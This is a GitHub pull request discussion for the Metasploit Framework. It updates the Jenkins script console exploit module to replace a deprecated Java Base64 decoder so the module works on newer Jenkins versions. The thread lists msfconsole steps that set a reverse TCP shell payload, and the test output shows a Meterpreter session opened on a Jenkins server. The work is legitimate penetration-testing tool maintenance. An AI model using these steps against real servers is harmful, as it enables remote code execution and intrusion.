metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Published 20 hours ago verified publisher icon rapid7

Update jenkins_script_console.rb to remove deprecated sun.misc.BASE64Decoder class

Open bojanisc opened this issue 2 years ago • 2 comments

Modern Java disabled the sun.misc.BASE64Decoder class so exploit will fail on any newer version of Jenkins. The java.util.Base64 class should be used now; the change has been confirmed to work with the latest version of Jenkins (the current exploit silently fails).

List the steps needed to make sure this thing works

  • [X] Start msfconsole
  • [X] use exploit/multi/http/jenkins_script_console
  • [X] set PAYLOAD linux/x86/shell/reverse_tcp
  • [X] set RHOSTS ...
  • [X] set RPORT
  • [X] set username admin
  • [X] set API_TOKEN xxx
  • [X] run

bojanisc avatar Jul 06 '22 13:07 bojanisc

Code changes look good to me but this will still need a run against a Jenkins server to make sure the changes work in a real world case, just to ensure the new code holds up in testing. Otherwise looks good, nice work @bojanisc!

gwillcox-r7 avatar Jul 06 '22 18:07 gwillcox-r7

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

github-actions[bot] avatar Jul 06 '22 18:07 github-actions[bot]

Successfully tested and changes look good to me:

msf6 exploit(multi/http/jenkins_script_console) > run

[*] Started reverse TCP handler on 192.168.140.5:4444 
[*] Checking access to the script console
[*] Authenticating with token...
[*] Using CSRF token: '08b53cc76c4f72a484ebafcf8720b5f9' (Jenkins-Crumb style)
[*] 127.0.0.1:5555 - Sending Linux stager...
[*] Sending stage (989032 bytes) to 192.168.140.5
[!] Deleting /tmp/tlVuL payload file
[*] Meterpreter session 1 opened (192.168.140.5:4444 -> 192.168.140.5:63040) at 2022-08-31 16:57:07 -0500

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 9.1 (Linux 5.10.76-linuxkit)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

space-r7 avatar Aug 31 '22 21:08 space-r7

Release Notes

This updates the exploit/multi/http/jenkins_script_console module to use the decoder from the java.util.Base64 class in place of the now-deprecated decoder from the sun.misc.BASE64Decoder class, enabling exploitation of newer Jenkins versions.

space-r7 avatar Aug 31 '22 22:08 space-r7